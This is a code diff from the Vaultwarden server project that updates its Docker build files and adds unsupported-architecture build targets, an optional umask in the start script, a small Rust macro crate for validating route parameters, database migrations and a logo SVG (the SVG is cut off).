-FROM --platform=linux/amd64 docker.io/vaultwarden/web-vault@sha256:798c0c893b6d16728878ff280b49da08863334d1f8dd88895580dc3dba622f08 as vault
+FROM --platform=linux/amd64 docker.io/vaultwarden/web-vault@sha256:f6ac819a2cd9e226f2cd2ec26196ede94a41e672e9672a11b5f307a19278b15e AS vault

 ########################## ALPINE BUILD IMAGES ##########################
 ## NOTE: The Alpine Base Images do not support other platforms then linux/amd64
 ## And for Alpine we define all build images here, they will only be loaded when actually used
-FROM --platform=linux/amd64 ghcr.io/blackdex/rust-musl:x86_64-musl-stable-1.76.0 as build_amd64
-FROM --platform=linux/amd64 ghcr.io/blackdex/rust-musl:aarch64-musl-stable-1.76.0 as build_arm64
-FROM --platform=linux/amd64 ghcr.io/blackdex/rust-musl:armv7-musleabihf-stable-1.76.0 as build_armv7
-FROM --platform=linux/amd64 ghcr.io/blackdex/rust-musl:arm-musleabi-stable-1.76.0 as build_armv6
+FROM --platform=linux/amd64 ghcr.io/blackdex/rust-musl:x86_64-musl-stable-1.88.0 AS build_amd64
+FROM --platform=linux/amd64 ghcr.io/blackdex/rust-musl:aarch64-musl-stable-1.88.0 AS build_arm64
+FROM --platform=linux/amd64 ghcr.io/blackdex/rust-musl:armv7-musleabihf-stable-1.88.0 AS build_armv7
+FROM --platform=linux/amd64 ghcr.io/blackdex/rust-musl:arm-musleabi-stable-1.88.0 AS build_armv6

 ########################## BUILD IMAGE ##########################
 # hadolint ignore=DL3006
-FROM --platform=linux/amd64 build_${TARGETARCH}${TARGETVARIANT} as build
+FROM --platform=linux/amd64 build_${TARGETARCH}${TARGETVARIANT} AS build
 ARG TARGETARCH
 ARG TARGETVARIANT
 ARG TARGETPLATFORM
@@ -58,33 +59,30 @@ ENV DEBIAN_FRONTEND=noninteractive \

 # Create CARGO_HOME folder and don't download rust docs
-RUN mkdir -pv "${CARGO_HOME}" \
-    && rustup set profile minimal
+RUN mkdir -pv "${CARGO_HOME}" && \
+    rustup set profile minimal

 # Creates a dummy project used to grab dependencies
 RUN USER=root cargo new --bin /app
 WORKDIR /app

-# Shared variables across Debian and Alpine
+# Environment variables for Cargo on Alpine based builds
 RUN echo "export CARGO_TARGET=${RUST_MUSL_CROSS_TARGET}" >> /env-cargo && \
-    # To be able to build the armv6 image with mimalloc we need to tell the linker to also look for libatomic
-    if [[ "${TARGETARCH}${TARGETVARIANT}" == "armv6" ]] ; then echo "export RUSTFLAGS='-Clink-arg=-latomic'" >> /env-cargo ; fi && \
     # Output the current contents of the file
     cat /env-cargo

-# Enable MiMalloc to improve performance on Alpine builds
-ARG DB=sqlite,mysql,postgresql,enable_mimalloc
-
 RUN source /env-cargo && \
     rustup target add "${CARGO_TARGET}"

-ARG CARGO_PROFILE=release
-ARG VW_VERSION
-
 # Copies over *only* your manifests and build files
-COPY ./Cargo.* ./
-COPY ./rust-toolchain.toml ./rust-toolchain.toml
-COPY ./build.rs ./build.rs
+COPY ./Cargo.* ./rust-toolchain.toml ./build.rs ./
+COPY ./macros ./macros
+
+ARG CARGO_PROFILE=release
+
+# Configure the DB ARG as late as possible to not invalidate the cached layers above
+# Enable MiMalloc to improve performance on Alpine builds
+ARG DB=sqlite,mysql,postgresql,enable_mimalloc

 # Builds your dependencies and removes the
 # dummy project, except the target folder
@@ -97,6 +95,8 @@ RUN source /env-cargo && \
 # To avoid copying unneeded files, use .dockerignore
 COPY . .

+ARG VW_VERSION
+
 # Builds again, this time it will be the actual source files being build
 RUN source /env-cargo && \
     # Make sure that we actually build the project by updating the src/main.rs timestamp
@@ -127,7 +127,7 @@ RUN source /env-cargo && \
 # To uninstall: docker run --privileged --rm tonistiigi/binfmt --uninstall 'qemu-*'
 #
 # We need to add `--platform` here, because of a podman bug: https://github.com/containers/buildah/issues/4742
-FROM --platform=$TARGETPLATFORM docker.io/library/alpine:3.19
+FROM --platform=$TARGETPLATFORM docker.io/library/alpine:3.22

 ENV ROCKET_PROFILE="release" \
     ROCKET_ADDRESS=0.0.0.0 \
@@ -144,14 +144,12 @@ RUN mkdir /data && \

 VOLUME /data
 EXPOSE 80
-EXPOSE 3012

 # Copies the files from the context (Rocket.toml file and web-vault)
 # and the binary from the "build" stage to the current stage
 WORKDIR /

-COPY docker/healthcheck.sh /healthcheck.sh
-COPY docker/start.sh /start.sh
+COPY docker/healthcheck.sh docker/start.sh /

 COPY --from=vault /web-vault ./web-vault
 COPY --from=build /app/target/final/vaultwarden .
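
As a sketch of how the build args above fit together for a local, single-platform build (the tag is an example; buildx selects the matching `build_*` stage for the host architecture):

```shell
docker buildx build \
  --file docker/Dockerfile.alpine \
  --build-arg DB=sqlite,mysql,postgresql,enable_mimalloc \
  --build-arg CARGO_PROFILE=release \
  --tag vaultwarden/server:local-alpine \
  .
```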

docker/Dockerfile.debian
@@ -1,4 +1,5 @@
 # syntax=docker/dockerfile:1
+# check=skip=FromPlatformFlagConstDisallowed,RedundantTargetPlatform

 # This file was generated using a Jinja2 template.
 # Please make your changes in `DockerSettings.yaml` or `Dockerfile.j2` and then `make`
@@ -18,24 +19,24 @@
 # - From https://hub.docker.com/r/vaultwarden/web-vault/tags,
 #   click the tag name to view the digest of the image it currently points to.
 # - From the command line:
-#     $ docker pull docker.io/vaultwarden/web-vault:v2024.1.2b
-#     $ docker image inspect --format "{{.RepoDigests}}" docker.io/vaultwarden/web-vault:v2024.1.2b
-#     [docker.io/vaultwarden/web-vault@sha256:798c0c893b6d16728878ff280b49da08863334d1f8dd88895580dc3dba622f08]
+#     $ docker pull docker.io/vaultwarden/web-vault:v2025.7.0
+#     $ docker image inspect --format "{{.RepoDigests}}" docker.io/vaultwarden/web-vault:v2025.7.0
+#     [docker.io/vaultwarden/web-vault@sha256:f6ac819a2cd9e226f2cd2ec26196ede94a41e672e9672a11b5f307a19278b15e]
 #
 # - Conversely, to get the tag name from the digest:
-#     $ docker image inspect --format "{{.RepoTags}}" docker.io/vaultwarden/web-vault@sha256:798c0c893b6d16728878ff280b49da08863334d1f8dd88895580dc3dba622f08
-#     [docker.io/vaultwarden/web-vault:v2024.1.2b]
+#     $ docker image inspect --format "{{.RepoTags}}" docker.io/vaultwarden/web-vault@sha256:f6ac819a2cd9e226f2cd2ec26196ede94a41e672e9672a11b5f307a19278b15e
+#     [docker.io/vaultwarden/web-vault:v2025.7.0]
 #
-FROM --platform=linux/amd64 docker.io/vaultwarden/web-vault@sha256:798c0c893b6d16728878ff280b49da08863334d1f8dd88895580dc3dba622f08 as vault
+FROM --platform=linux/amd64 docker.io/vaultwarden/web-vault@sha256:f6ac819a2cd9e226f2cd2ec26196ede94a41e672e9672a11b5f307a19278b15e AS vault

 ########################## Cross Compile Docker Helper Scripts ##########################
 ## We use the linux/amd64 no matter which Build Platform, since these are all bash scripts
 ## And these bash scripts do not have any significant difference if at all
-FROM --platform=linux/amd64 docker.io/tonistiigi/xx@sha256:c9609ace652bbe51dd4ce90e0af9d48a4590f1214246da5bc70e46f6dd586edc AS xx
+FROM --platform=linux/amd64 docker.io/tonistiigi/xx@sha256:9c207bead753dda9430bdd15425c6518fc7a03d866103c516a2c6889188f5894 AS xx

 ########################## BUILD IMAGE ##########################
 # hadolint ignore=DL3006
-FROM --platform=$BUILDPLATFORM docker.io/library/rust:1.76.0-slim-bookworm as build
+FROM --platform=$BUILDPLATFORM docker.io/library/rust:1.88.0-slim-bookworm AS build
 COPY --from=xx / /
 ARG TARGETARCH
 ARG TARGETVARIANT
@@ -64,10 +65,7 @@ RUN apt-get update && \
     "libc6-$(xx-info debian-arch)-cross" \
     "libc6-dev-$(xx-info debian-arch)-cross" \
     "linux-libc-dev-$(xx-info debian-arch)-cross" && \
-    # Run xx-cargo early, since it sometimes seems to break when run at a later stage
-    echo "export CARGO_TARGET=$(xx-cargo --print-target-triple)" >> /env-cargo
-
-RUN xx-apt-get install -y \
+    xx-apt-get install -y \
     --no-install-recommends \
     gcc \
     libmariadb3 \
@@ -78,44 +76,52 @@ RUN xx-apt-get install -y \
     # Force install arch dependend mariadb dev packages
     # Installing them the normal way breaks several other packages (again)
     apt-get download "libmariadb-dev-compat:$(xx-info debian-arch)" "libmariadb-dev:$(xx-info debian-arch)" && \
-    dpkg --force-all -i ./libmariadb-dev*.deb
+    dpkg --force-all -i ./libmariadb-dev*.deb && \
+    # Run xx-cargo early, since it sometimes seems to break when run at a later stage
+    echo "export CARGO_TARGET=$(xx-cargo --print-target-triple)" >> /env-cargo

 # Create CARGO_HOME folder and don't download rust docs
-RUN mkdir -pv "${CARGO_HOME}" \
-    && rustup set profile minimal
+RUN mkdir -pv "${CARGO_HOME}" && \
+    rustup set profile minimal

 # Creates a dummy project used to grab dependencies
 RUN USER=root cargo new --bin /app
 WORKDIR /app

-# Environment variables for cargo across Debian and Alpine
+# Environment variables for Cargo on Debian based builds
+ARG TARGET_PKG_CONFIG_PATH
+
 RUN source /env-cargo && \
     if xx-info is-cross ; then \
     # We can't use xx-cargo since that uses clang, which doesn't work for our libraries.
     # Because of this we generate the needed environment variables here which we can load in the needed steps.
     echo "export CC_$(echo "${CARGO_TARGET}" | tr '[:upper:]' '[:lower:]' | tr - _)=/usr/bin/$(xx-info)-gcc" >> /env-cargo && \
     echo "export CARGO_TARGET_$(echo "${CARGO_TARGET}" | tr '[:lower:]' '[:upper:]' | tr - _)_LINKER=/usr/bin/$(xx-info)-gcc" >> /env-cargo && \
-    echo "export PKG_CONFIG=/usr/bin/$(xx-info)-pkg-config" >> /env-cargo && \
     echo "export CROSS_COMPILE=1" >> /env-cargo && \
-    echo "export OPENSSL_INCLUDE_DIR=/usr/include/$(xx-info)" >> /env-cargo && \
-    echo "export OPENSSL_LIB_DIR=/usr/lib/$(xx-info)" >> /env-cargo ; \
+    echo "export PKG_CONFIG_ALLOW_CROSS=1" >> /env-cargo && \
+    # For some architectures `xx-info` returns a triple which doesn't matches the path on disk
+    # In those cases you can override this by setting the `TARGET_PKG_CONFIG_PATH` build-arg
+    if [[ -n "${TARGET_PKG_CONFIG_PATH}" ]]; then \
+        echo "export TARGET_PKG_CONFIG_PATH=${TARGET_PKG_CONFIG_PATH}" >> /env-cargo ; \
+    else \
+        echo "export PKG_CONFIG_PATH=/usr/lib/$(xx-info)/pkgconfig" >> /env-cargo ; \
+    fi && \
+    echo "# End of env-cargo" >> /env-cargo ; \
     fi && \
     # Output the current contents of the file
     cat /env-cargo

-# Configure the DB ARG as late as possible to not invalidate the cached layers above
-ARG DB=sqlite,mysql,postgresql
-
 RUN source /env-cargo && \
     rustup target add "${CARGO_TARGET}"

-ARG CARGO_PROFILE=release
-ARG VW_VERSION
-
 # Copies over *only* your manifests and build files
-COPY ./Cargo.* ./
-COPY ./rust-toolchain.toml ./rust-toolchain.toml
-COPY ./build.rs ./build.rs
+COPY ./Cargo.* ./rust-toolchain.toml ./build.rs ./
+COPY ./macros ./macros
+
+ARG CARGO_PROFILE=release
+
+# Configure the DB ARG as late as possible to not invalidate the cached layers above
+ARG DB=sqlite,mysql,postgresql

 # Builds your dependencies and removes the
 # dummy project, except the target folder
@@ -128,6 +134,8 @@ RUN source /env-cargo && \
 # To avoid copying unneeded files, use .dockerignore
 COPY . .

+ARG VW_VERSION
+
 # Builds again, this time it will be the actual source files being build
 RUN source /env-cargo && \
     # Make sure that we actually build the project by updating the src/main.rs timestamp
@@ -179,14 +187,12 @@ RUN mkdir /data && \

 VOLUME /data
 EXPOSE 80
-EXPOSE 3012

 # Copies the files from the context (Rocket.toml file and web-vault)
 # and the binary from the "build" stage to the current stage
 WORKDIR /

-COPY docker/healthcheck.sh /healthcheck.sh
-COPY docker/start.sh /start.sh
+COPY docker/healthcheck.sh docker/start.sh /

 COPY --from=vault /web-vault ./web-vault
 COPY --from=build /app/target/final/vaultwarden .
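
A sketch of the new `TARGET_PKG_CONFIG_PATH` override in action, using the same value the `debian-386` bake target (further down) ships with; platform and tag are examples:

```shell
docker buildx build \
  --file docker/Dockerfile.debian \
  --platform linux/386 \
  --build-arg TARGET_PKG_CONFIG_PATH=/usr/lib/i386-linux-gnu/pkgconfig \
  --tag vaultwarden/server:local-386 \
  .
```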

docker/Dockerfile.j2
@@ -1,4 +1,5 @@
 # syntax=docker/dockerfile:1
+# check=skip=FromPlatformFlagConstDisallowed,RedundantTargetPlatform

 # This file was generated using a Jinja2 template.
 # Please make your changes in `DockerSettings.yaml` or `Dockerfile.j2` and then `make`
@@ -26,7 +27,7 @@
 #     $ docker image inspect --format "{{ '{{' }}.RepoTags}}" docker.io/vaultwarden/web-vault@{{ vault_image_digest }}
 #     [docker.io/vaultwarden/web-vault:{{ vault_version }}]
 #
-FROM --platform=linux/amd64 docker.io/vaultwarden/web-vault@{{ vault_image_digest }} as vault
+FROM --platform=linux/amd64 docker.io/vaultwarden/web-vault@{{ vault_image_digest }} AS vault

 {% if base == "debian" %}
 ########################## Cross Compile Docker Helper Scripts ##########################
@@ -38,13 +39,13 @@ FROM --platform=linux/amd64 docker.io/tonistiigi/xx@{{ xx_image_digest }} AS xx
 ## NOTE: The Alpine Base Images do not support other platforms then linux/amd64
 ## And for Alpine we define all build images here, they will only be loaded when actually used
 {% for arch in build_stage_image[base].arch_image %}
-FROM --platform={{ build_stage_image[base].platform }} {{ build_stage_image[base].arch_image[arch] }} as build_{{ arch }}
+FROM --platform={{ build_stage_image[base].platform }} {{ build_stage_image[base].arch_image[arch] }} AS build_{{ arch }}
 {% endfor %}
 {% endif %}

 ########################## BUILD IMAGE ##########################
 # hadolint ignore=DL3006
-FROM --platform={{ build_stage_image[base].platform }} {{ build_stage_image[base].image }} as build
+FROM --platform={{ build_stage_image[base].platform }} {{ build_stage_image[base].image }} AS build
 {% if base == "debian" %}
 COPY --from=xx / /
 {% endif %}
@@ -82,10 +83,7 @@ RUN apt-get update && \
     "libc6-$(xx-info debian-arch)-cross" \
     "libc6-dev-$(xx-info debian-arch)-cross" \
     "linux-libc-dev-$(xx-info debian-arch)-cross" && \
-    # Run xx-cargo early, since it sometimes seems to break when run at a later stage
-    echo "export CARGO_TARGET=$(xx-cargo --print-target-triple)" >> /env-cargo
-
-RUN xx-apt-get install -y \
+    xx-apt-get install -y \
     --no-install-recommends \
     gcc \
     libmariadb3 \
@@ -96,57 +94,66 @@ RUN xx-apt-get install -y \
     # Force install arch dependend mariadb dev packages
     # Installing them the normal way breaks several other packages (again)
     apt-get download "libmariadb-dev-compat:$(xx-info debian-arch)" "libmariadb-dev:$(xx-info debian-arch)" && \
-    dpkg --force-all -i ./libmariadb-dev*.deb
+    dpkg --force-all -i ./libmariadb-dev*.deb && \
+    # Run xx-cargo early, since it sometimes seems to break when run at a later stage
+    echo "export CARGO_TARGET=$(xx-cargo --print-target-triple)" >> /env-cargo
 {% endif %}

 # Create CARGO_HOME folder and don't download rust docs
-RUN mkdir -pv "${CARGO_HOME}" \
-    && rustup set profile minimal
+RUN mkdir -pv "${CARGO_HOME}" && \
+    rustup set profile minimal

 # Creates a dummy project used to grab dependencies
 RUN USER=root cargo new --bin /app
 WORKDIR /app

 {% if base == "debian" %}
-# Environment variables for cargo across Debian and Alpine
+# Environment variables for Cargo on Debian based builds
+ARG TARGET_PKG_CONFIG_PATH
+
 RUN source /env-cargo && \
     if xx-info is-cross ; then \
     # We can't use xx-cargo since that uses clang, which doesn't work for our libraries.
     # Because of this we generate the needed environment variables here which we can load in the needed steps.
     echo "export CC_$(echo "${CARGO_TARGET}" | tr '[:upper:]' '[:lower:]' | tr - _)=/usr/bin/$(xx-info)-gcc" >> /env-cargo && \
     echo "export CARGO_TARGET_$(echo "${CARGO_TARGET}" | tr '[:lower:]' '[:upper:]' | tr - _)_LINKER=/usr/bin/$(xx-info)-gcc" >> /env-cargo && \
-    echo "export PKG_CONFIG=/usr/bin/$(xx-info)-pkg-config" >> /env-cargo && \
     echo "export CROSS_COMPILE=1" >> /env-cargo && \
-    echo "export OPENSSL_INCLUDE_DIR=/usr/include/$(xx-info)" >> /env-cargo && \
-    echo "export OPENSSL_LIB_DIR=/usr/lib/$(xx-info)" >> /env-cargo ; \
+    echo "export PKG_CONFIG_ALLOW_CROSS=1" >> /env-cargo && \
+    # For some architectures `xx-info` returns a triple which doesn't matches the path on disk
+    # In those cases you can override this by setting the `TARGET_PKG_CONFIG_PATH` build-arg
+    if [[ -n "${TARGET_PKG_CONFIG_PATH}" ]]; then \
+        echo "export TARGET_PKG_CONFIG_PATH=${TARGET_PKG_CONFIG_PATH}" >> /env-cargo ; \
+    else \
+        echo "export PKG_CONFIG_PATH=/usr/lib/$(xx-info)/pkgconfig" >> /env-cargo ; \
+    fi && \
+    echo "# End of env-cargo" >> /env-cargo ; \
     fi && \
     # Output the current contents of the file
     cat /env-cargo

-# Configure the DB ARG as late as possible to not invalidate the cached layers above
-ARG DB=sqlite,mysql,postgresql
-
 {% elif base == "alpine" %}
-# Shared variables across Debian and Alpine
+# Environment variables for Cargo on Alpine based builds
 RUN echo "export CARGO_TARGET=${RUST_MUSL_CROSS_TARGET}" >> /env-cargo && \
-    # To be able to build the armv6 image with mimalloc we need to tell the linker to also look for libatomic
-    if [[ "${TARGETARCH}${TARGETVARIANT}" == "armv6" ]] ; then echo "export RUSTFLAGS='-Clink-arg=-latomic'" >> /env-cargo ; fi && \
     # Output the current contents of the file
     cat /env-cargo

-# Enable MiMalloc to improve performance on Alpine builds
-ARG DB=sqlite,mysql,postgresql,enable_mimalloc
-
 {% endif %}

 RUN source /env-cargo && \
     rustup target add "${CARGO_TARGET}"

-ARG CARGO_PROFILE=release
-ARG VW_VERSION
-
 # Copies over *only* your manifests and build files
-COPY ./Cargo.* ./
-COPY ./rust-toolchain.toml ./rust-toolchain.toml
-COPY ./build.rs ./build.rs
+COPY ./Cargo.* ./rust-toolchain.toml ./build.rs ./
+COPY ./macros ./macros
+
+ARG CARGO_PROFILE=release
+
+# Configure the DB ARG as late as possible to not invalidate the cached layers above
+{% if base == "debian" %}
+ARG DB=sqlite,mysql,postgresql
+{% elif base == "alpine" %}
+# Enable MiMalloc to improve performance on Alpine builds
+ARG DB=sqlite,mysql,postgresql,enable_mimalloc
+{% endif %}

 # Builds your dependencies and removes the
 # dummy project, except the target folder
@@ -159,6 +166,8 @@ RUN source /env-cargo && \
 # To avoid copying unneeded files, use .dockerignore
 COPY . .

+ARG VW_VERSION
+
 # Builds again, this time it will be the actual source files being build
 RUN source /env-cargo && \
     # Make sure that we actually build the project by updating the src/main.rs timestamp
@@ -222,14 +231,12 @@ RUN mkdir /data && \

 VOLUME /data
 EXPOSE 80
-EXPOSE 3012

 # Copies the files from the context (Rocket.toml file and web-vault)
 # and the binary from the "build" stage to the current stage
 WORKDIR /

-COPY docker/healthcheck.sh /healthcheck.sh
-COPY docker/start.sh /start.sh
+COPY docker/healthcheck.sh docker/start.sh /

 COPY --from=vault /web-vault ./web-vault
 COPY --from=build /app/target/final/vaultwarden .
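
A typical editing loop for this template, as a sketch (it assumes the `make` mentioned in the file header is run from the `docker/` directory where these files live):

```shell
cd docker
# edit DockerSettings.yaml or Dockerfile.j2, then re-render:
make
git diff Dockerfile.alpine Dockerfile.debian   # review the regenerated output
```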
docker/README.md
@@ -11,6 +11,11 @@ With just these two files we can build both Debian and Alpine images for the fol
 - armv7 (linux/arm/v7)
 - armv6 (linux/arm/v6)

+Some unsupported platforms for Debian based images. These are not built and tested by default and are only provided to make it easier for users to build for these architectures.
+- 386 (linux/386)
+- ppc64le (linux/ppc64le)
+- s390x (linux/s390x)
+
 To build these containers you need to enable QEMU binfmt support to be able to run/emulate architectures which are different then your host.<br>
 This ensures the container build process can run binaries from other architectures.<br>
@@ -41,7 +46,7 @@ There also is an option to use an other docker container to provide support for
 ```bash
 # To install and activate
 docker run --privileged --rm tonistiigi/binfmt --install arm64,arm
-# To unistall
+# To uninstall
 docker run --privileged --rm tonistiigi/binfmt --uninstall 'qemu-*'
 ```

docker/docker-bake.hcl
@@ -17,7 +17,7 @@ variable "SOURCE_REPOSITORY_URL" {
   default = null
 }

-// The commit hash of of the current commit this build was triggered on
+// The commit hash of the current commit this build was triggered on
 variable "SOURCE_COMMIT" {
   default = null
 }
@@ -125,6 +125,31 @@ target "debian-armv6" {
   tags = generate_tags("", "-armv6")
 }

+// ==== Start of unsupported Debian architecture targets ===
+// These are provided just to help users build for these rare platforms
+// They will not be built by default
+target "debian-386" {
+  inherits = ["debian"]
+  platforms = ["linux/386"]
+  tags = generate_tags("", "-386")
+  args = {
+    TARGET_PKG_CONFIG_PATH = "/usr/lib/i386-linux-gnu/pkgconfig"
+  }
+}
+
+target "debian-ppc64le" {
+  inherits = ["debian"]
+  platforms = ["linux/ppc64le"]
+  tags = generate_tags("", "-ppc64le")
+}
+
+target "debian-s390x" {
+  inherits = ["debian"]
+  platforms = ["linux/s390x"]
+  tags = generate_tags("", "-s390x")
+}
+// ==== End of unsupported Debian architecture targets ===
+
 // A Group to build all platforms individually for local testing
 group "debian-all" {
   targets = ["debian-amd64", "debian-arm64", "debian-armv7", "debian-armv6"]
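
The unsupported targets above are deliberately left out of the `debian-all` group, so they have to be invoked by name; a usage sketch:

```shell
docker buildx bake --file docker/docker-bake.hcl debian-386
```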

docker/start.sh
@@ -1,5 +1,9 @@
 #!/bin/sh

+if [ -n "${UMASK}" ]; then
+    umask "${UMASK}"
+fi
+
 if [ -r /etc/vaultwarden.sh ]; then
     . /etc/vaultwarden.sh
 elif [ -r /etc/bitwarden_rs.sh ]; then
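
With this addition the file-creation mask can be tightened from the container environment; a sketch based on the run command from the README (`0027` is an example value):

```shell
docker run --detach --name vaultwarden \
  --env UMASK=0027 \
  --volume /vw-data/:/data/ \
  --publish 127.0.0.1:8000:80 \
  vaultwarden/server:latest
```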

macros/Cargo.toml (new file)
@@ -0,0 +1,16 @@
+[package]
+name = "macros"
+version = "0.1.0"
+edition = "2021"
+
+[lib]
+name = "macros"
+path = "src/lib.rs"
+proc-macro = true
+
+[dependencies]
+quote = "1.0.40"
+syn = "2.0.104"
+
+[lints]
+workspace = true

macros/src/lib.rs (new file)
@@ -0,0 +1,56 @@
+use proc_macro::TokenStream;
+use quote::quote;
+
+#[proc_macro_derive(UuidFromParam)]
+pub fn derive_uuid_from_param(input: TokenStream) -> TokenStream {
+    let ast = syn::parse(input).unwrap();
+
+    impl_derive_uuid_macro(&ast)
+}
+
+fn impl_derive_uuid_macro(ast: &syn::DeriveInput) -> TokenStream {
+    let name = &ast.ident;
+    let gen_derive = quote! {
+        #[automatically_derived]
+        impl<'r> rocket::request::FromParam<'r> for #name {
+            type Error = ();
+
+            #[inline(always)]
+            fn from_param(param: &'r str) -> Result<Self, Self::Error> {
+                if uuid::Uuid::parse_str(param).is_ok() {
+                    Ok(Self(param.to_string()))
+                } else {
+                    Err(())
+                }
+            }
+        }
+    };
+    gen_derive.into()
+}
+
+#[proc_macro_derive(IdFromParam)]
+pub fn derive_id_from_param(input: TokenStream) -> TokenStream {
+    let ast = syn::parse(input).unwrap();
+
+    impl_derive_safestring_macro(&ast)
+}
+
+fn impl_derive_safestring_macro(ast: &syn::DeriveInput) -> TokenStream {
+    let name = &ast.ident;
+    let gen_derive = quote! {
+        #[automatically_derived]
+        impl<'r> rocket::request::FromParam<'r> for #name {
+            type Error = ();
+
+            #[inline(always)]
+            fn from_param(param: &'r str) -> Result<Self, Self::Error> {
+                if param.chars().all(|c| matches!(c, 'a'..='z' | 'A'..='Z' |'0'..='9' | '-')) {
+                    Ok(Self(param.to_string()))
+                } else {
+                    Err(())
+                }
+            }
+        }
+    };
+    gen_derive.into()
+}
MySQL migrations (new files)
@@ -0,0 +1 @@
+ALTER TABLE twofactor MODIFY last_used BIGINT NOT NULL;
@@ -0,0 +1 @@
+DROP TABLE twofactor_duo_ctx;
@@ -0,0 +1,8 @@
+CREATE TABLE twofactor_duo_ctx (
+    state       VARCHAR(64) NOT NULL,
+    user_email  VARCHAR(255) NOT NULL,
+    nonce       VARCHAR(64) NOT NULL,
+    exp         BIGINT NOT NULL,
+
+    PRIMARY KEY (state)
+);
@@ -0,0 +1 @@
+ALTER TABLE `twofactor_incomplete` DROP COLUMN `device_type`;
@@ -0,0 +1 @@
+ALTER TABLE twofactor_incomplete ADD COLUMN device_type INTEGER NOT NULL DEFAULT 14; -- 14 = Unknown Browser

migrations/mysql/2025-01-09-172300_add_manage/up.sql (new file)
@@ -0,0 +1,5 @@
+ALTER TABLE users_collections
+ADD COLUMN manage BOOLEAN NOT NULL DEFAULT FALSE;
+
+ALTER TABLE collections_groups
+ADD COLUMN manage BOOLEAN NOT NULL DEFAULT FALSE;

PostgreSQL migrations (new files)
@@ -0,0 +1,3 @@
+ALTER TABLE twofactor
+ALTER COLUMN last_used TYPE BIGINT,
+ALTER COLUMN last_used SET NOT NULL;
@@ -0,0 +1 @@
+DROP TABLE twofactor_duo_ctx;
@@ -0,0 +1,8 @@
+CREATE TABLE twofactor_duo_ctx (
+    state       VARCHAR(64) NOT NULL,
+    user_email  VARCHAR(255) NOT NULL,
+    nonce       VARCHAR(64) NOT NULL,
+    exp         BIGINT NOT NULL,
+
+    PRIMARY KEY (state)
+);
@@ -0,0 +1 @@
+ALTER TABLE twofactor_incomplete DROP COLUMN device_type;
@@ -0,0 +1 @@
+ALTER TABLE twofactor_incomplete ADD COLUMN device_type INTEGER NOT NULL DEFAULT 14; -- 14 = Unknown Browser
@@ -0,0 +1,5 @@
+ALTER TABLE users_collections
+ADD COLUMN manage BOOLEAN NOT NULL DEFAULT FALSE;
+
+ALTER TABLE collections_groups
+ADD COLUMN manage BOOLEAN NOT NULL DEFAULT FALSE;

SQLite migrations (new files)
@@ -0,0 +1 @@
+-- Integer size in SQLite is already i64, so we don't need to do anything
@@ -0,0 +1 @@
+DROP TABLE twofactor_duo_ctx;
@@ -0,0 +1,8 @@
+CREATE TABLE twofactor_duo_ctx (
+    state       TEXT NOT NULL,
+    user_email  TEXT NOT NULL,
+    nonce       TEXT NOT NULL,
+    exp         INTEGER NOT NULL,
+
+    PRIMARY KEY (state)
+);
@@ -0,0 +1 @@
+ALTER TABLE `twofactor_incomplete` DROP COLUMN `device_type`;
@@ -0,0 +1 @@
+ALTER TABLE twofactor_incomplete ADD COLUMN device_type INTEGER NOT NULL DEFAULT 14; -- 14 = Unknown Browser

migrations/sqlite/2025-01-09-172300_add_manage/up.sql (new file)
@@ -0,0 +1,5 @@
+ALTER TABLE users_collections
+ADD COLUMN manage BOOLEAN NOT NULL DEFAULT 0; -- FALSE
+
+ALTER TABLE collections_groups
+ADD COLUMN manage BOOLEAN NOT NULL DEFAULT 0; -- FALSE
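
Vaultwarden applies these migrations automatically at startup; to double-check that the new `manage` column landed on a SQLite install, a quick sketch (database path assumed from the Docker examples):

```shell
sqlite3 /vw-data/db.sqlite3 "PRAGMA table_info(users_collections);"
```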
resources/vaultwarden-logo-auto.svg (new file)
@@ -0,0 +1,78 @@
+<svg width="1365.8256" height="280.48944" version="1.1" viewBox="0 0 1365.8255 280.48944" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+  <style>
+    @media (prefers-color-scheme: dark) {
+      svg { -webkit-filter:invert(0.90); filter:invert(0.90); }
+    }</style>
+  <title>Vaultwarden Logo</title>
+  <defs>
+    <mask id="d">
+      <rect x="-60" y="-60" width="120" height="120" fill="#fff"/>
+      <circle id="b" cy="-40" r="3"/>
+      <use transform="rotate(72)" xlink:href="#b"/>
+      <use transform="rotate(144)" xlink:href="#b"/>
+      <use transform="rotate(216)" xlink:href="#b"/>
+      <use transform="rotate(-72)" xlink:href="#b"/>
+    </mask>
+  </defs>
+  <g transform="translate(-10.708266,-9.2965379)" aria-label="aultwarden">
+    <path d="m371.55338 223.43649-5.76172-14.84375h-0.78125q-7.51953 9.47266-15.52735 13.1836-7.91015 3.61328-20.70312 3.61328-15.72266 0-24.80469-8.98438-8.98437-8.98437-8.98437-25.58593 0-17.38282 12.10937-25.58594 12.20703-8.30078 36.71875-9.17969l18.94531-0.58594v-4.78515q0-16.60157-16.99218-16.60157-13.08594 0-30.76172 7.91016l-9.86328-20.11719q18.84765-9.86328 41.79687-9.86328 21.97266 0 33.69141 9.57031 11.71875 9.57032 11.71875 29.10157v72.7539zm-8.78907-50.58593-11.52343 0.39062q-12.98829 0.39063-19.33594 4.6875-6.34766 4.29688-6.34766 13.08594 0 12.59765 14.45313 12.59765 10.35156 0 16.5039-5.95703 6.25-5.95703 6.25-15.82031zm137.59766 50.58593-4.00391-13.96484h-1.5625q-4.78515 7.61719-13.57422 11.81641-8.78906 4.10156-20.01953 4.10156-19.23828 0-29.0039-10.25391-9.76563-10.35156-9.76563-29.6875v-71.1914h29.78516v63.76953q0 11.8164 4.19922 17.77343 4.19922 5.85938 13.3789 5.85938 12.5 0 18.06641-8.30078 5.56641-8.39844 5.56641-27.73438v-51.36718h29.78515v109.17968zm83.88672 0h-29.78516v-151.953122h29.78516zm77.24609-21.77734q7.8125 0 18.75-3.41797v22.16797q-11.13281 4.98047-27.34375 4.98047-17.87109 0-26.07422-8.98438-8.10547-9.08203-8.10547-27.14843v-52.63672h-14.25781v-12.59766l16.40625-9.96094 8.59375-23.046872h19.04297v23.242192h30.56641v22.36328h-30.56641v52.63672q0 6.34765 3.51563 9.375 3.61328 3.02734 9.47265 3.02734z"/>
